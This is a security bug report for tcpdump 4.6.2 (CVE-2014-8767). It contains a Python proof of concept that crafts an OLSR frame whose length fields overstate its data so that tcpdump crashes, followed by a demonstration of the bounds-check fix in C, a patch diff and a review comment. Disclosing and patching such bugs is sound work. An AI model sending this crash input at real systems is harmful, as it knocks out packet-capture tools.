Package: tcpdump
Version: 4.6.2
tags: Security
Use the following script to generate the packet:
#!/usr/bin/env python
# Sends the crafted frame on the loopback interface. AF_PACKET raw
# sockets need root, so run this with sudo while tcpdump is listening.
from socket import socket, AF_PACKET, SOCK_RAW

s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
# Ethernet + IPv4 (10.1.1.104 -> 10.2.2.2) + UDP to port 698 (OLSR) + OLSR
# payload; the UDP and OLSR length fields claim more data than the frame
# carries. Bytes literal so the send() works on both Python 2 and 3.
olsr_frame = b"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"
s.send(olsr_frame)
s.close()

# In another terminal, before sending: sudo tcpdump -i lo -s 0 -n -v
This causes a segfault in tcpdump. This bug was reported as CVE-2014-8767.
The proposed patch is in the attached file. The main idea is checking the
length of the available data before printing it on screen.
The credit belongs to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
The original report on BugTraq is:
http://seclists.org/bugtraq/2014/Nov/90
--
CongNT
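The check the patch adds, written out as a small stand-alone dissector so the effect of trusting link_msg_size can be seen in isolation. This is an added example, not tcpdump's print-olsr.c and not the attached patch; the OLSR field offsets follow RFC 3626, and the sample payload is constructed here (it is not the PoC frame above).

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Field sizes from RFC 3626 (OLSR), in bytes. */
#define OLSR_PKT_HDR    4   /* packet length (2) + packet sequence number (2) */
#define OLSR_MSG_HDR    12  /* type, vtime, msg size (2), originator (4), ttl, hops, msg seq (2) */
#define OLSR_HELLO_HDR  4   /* reserved (2), htime, willingness */
#define OLSR_LINK_HDR   4   /* link code, reserved, link message size (2) */
#define OLSR_MSG_HELLO  1
#define MAX_NEIGHBORS   16

struct hello_result {
    uint32_t neighbors[MAX_NEIGHBORS]; /* neighbor IPv4 addresses, host byte order */
    size_t   count;                    /* neighbors actually within captured data */
    size_t   claimed_len;              /* link_msg_size value taken from the packet */
    int      truncated;                /* 1 when the clamp fired */
};

static uint16_t get16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

static uint32_t get32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/*
 * Walk the neighbor list of the first link message in the first HELLO
 * message. 'pkt' is the OLSR payload (just after the UDP header) and
 * 'caplen' is how much of it was captured; pkt + caplen plays the role
 * of ndo->ndo_snapend. Returns 0 on success, -1 if the fixed headers are
 * not fully captured or the message is not a HELLO.
 */
int olsr_hello_neighbors(const uint8_t *pkt, size_t caplen,
                         struct hello_result *res)
{
    const uint8_t *snapend = pkt + caplen;
    const uint8_t *msg = pkt + OLSR_PKT_HDR;
    const uint8_t *link;
    const uint8_t *msg_data;
    size_t hello_len;
    size_t caplength;

    memset(res, 0, sizeof(*res));

    /* Fixed-size headers are checked against caplen before any read. */
    if (caplen < OLSR_PKT_HDR + OLSR_MSG_HDR + OLSR_HELLO_HDR + OLSR_LINK_HDR)
        return -1;
    if (msg[0] != OLSR_MSG_HELLO)
        return -1;

    link = msg + OLSR_MSG_HDR + OLSR_HELLO_HDR;
    msg_data = link + OLSR_LINK_HDR;

    /* link_msg_size is attacker controlled: the unpatched loop trusted it
     * and walked hello_len bytes past msg_data regardless of caplen. */
    res->claimed_len = get16(link + 2);
    hello_len = res->claimed_len > OLSR_LINK_HDR
              ? res->claimed_len - OLSR_LINK_HDR : 0;

    /* The fix: clamp to the bytes actually captured, and remember it. */
    caplength = (size_t)(snapend - msg_data);
    if (hello_len > caplength) {
        hello_len = caplength;
        res->truncated = 1;
    }

    /* tcpdump prints these 4 per line; here they are just collected. */
    while (hello_len >= 4 && res->count < MAX_NEIGHBORS) {
        res->neighbors[res->count++] = get32(msg_data);
        msg_data += 4;
        hello_len -= 4;
    }
    return 0;
}

/* Constructed sample OLSR payload: one HELLO message whose link message
 * claims 0x0200 bytes while only two neighbor addresses (8 bytes) follow. */
static const uint8_t sample_olsr[] = {
    0x00, 0x20, 0x00, 0x01,   /* packet length 32, packet seq 1 */
    0x01, 0x00, 0x00, 0x1c,   /* HELLO, vtime 0, message size 28 */
    0x0a, 0x00, 0x00, 0x01,   /* originator 10.0.0.1 */
    0x01, 0x00, 0x00, 0x01,   /* ttl 1, hop count 0, message seq 1 */
    0x00, 0x00, 0x00, 0x03,   /* reserved, htime, willingness */
    0x06, 0x00, 0x02, 0x00,   /* link code, reserved, link_msg_size 0x0200 */
    0x0a, 0x00, 0x00, 0x02,   /* neighbor 10.0.0.2 */
    0x0a, 0x00, 0x00, 0x03,   /* neighbor 10.0.0.3 */
};

int main(void)
{
    struct hello_result r;
    size_t i;

    if (olsr_hello_neighbors(sample_olsr, sizeof(sample_olsr), &r) != 0) {
        puts("[|olsr]");
        return 1;
    }
    printf("link_msg_size claims %zu bytes, %zu captured\n",
           r.claimed_len, sizeof(sample_olsr));
    for (i = 0; i < r.count; i++)
        printf("\tneighbor %u.%u.%u.%u\n",
               (unsigned)(r.neighbors[i] >> 24), (unsigned)((r.neighbors[i] >> 16) & 0xff),
               (unsigned)((r.neighbors[i] >> 8) & 0xff), (unsigned)(r.neighbors[i] & 0xff));
    if (r.truncated)
        puts("\t[|olsr]");
    return 0;
}
```

The clamp mirrors the patch; the `truncated` flag is the extra piece a reviewer would ask for, so a capture cut short by the snaplen (or a lying length field) is reported as truncated rather than shown as a short but complete neighbor list.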
--- tcpdump-tcpdump-4.6/print-olsr.c 2014-10-23 14:07:12.000000000 +0700
+++ tcpdump-4.6.2/print-olsr.c 2014-11-21 14:56:18.205542679 +0700
@@ -234,6 +234,13 @@
ND_PRINT((ndo, "\n\t neighbor\n\t\t"));
neighbor = 1;
+ u_int caplength;
+
+ /* Checking length of available data before print */
+ caplength = (ndo->ndo_snapend >= msg_data) ? ndo->ndo_snapend - msg_data : 0;
+ if (hello_len > caplength)
+ hello_len = caplength;
+
while (hello_len >= sizeof(struct in_addr)) {
/* print 4 neighbors per line */
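Review bot: the added `u_int caplength;` is declared after the statement `neighbor = 1;`, which a C89 compiler rejects as a declaration after code; move it to the top of the enclosing block with the other locals. The clamp itself also hides the truncation: when `hello_len > caplength` the loop silently prints only the neighbors that fit, so a packet cut off by the snaplen (or one whose link_msg_size lies, as in the PoC) is displayed as a short but apparently complete neighbor list. Record that the clamp fired (or check the remaining length inside the `while` loop) and print a truncation marker after the last neighbor so the reader can tell the capture was incomplete.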